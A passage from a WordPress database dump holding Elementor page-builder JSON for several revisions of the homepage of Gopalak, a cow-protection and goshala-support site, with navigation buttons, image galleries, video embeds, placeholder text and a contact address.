":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10004,1675,'_elementor_page_assets','a:0:{}'),(10006,1676,'_elementor_edit_mode','builder'),(10007,1676,'_elementor_template_type','wp-page'),(10008,1676,'_elementor_version','3.7.8'),(10009,1676,'_wp_page_template','elementor_canvas'),(10010,1676,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10011,1676,'_elementor_page_assets','a:0:{}'),(10014,1677,'_elementor_edit_mode','builder'),(10015,1677,'_elementor_template_type','wp-page'),(10016,1677,'_elementor_version','3.7.8'),(10017,1677,'_wp_page_template','elementor_canvas'),(10018,1677,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About 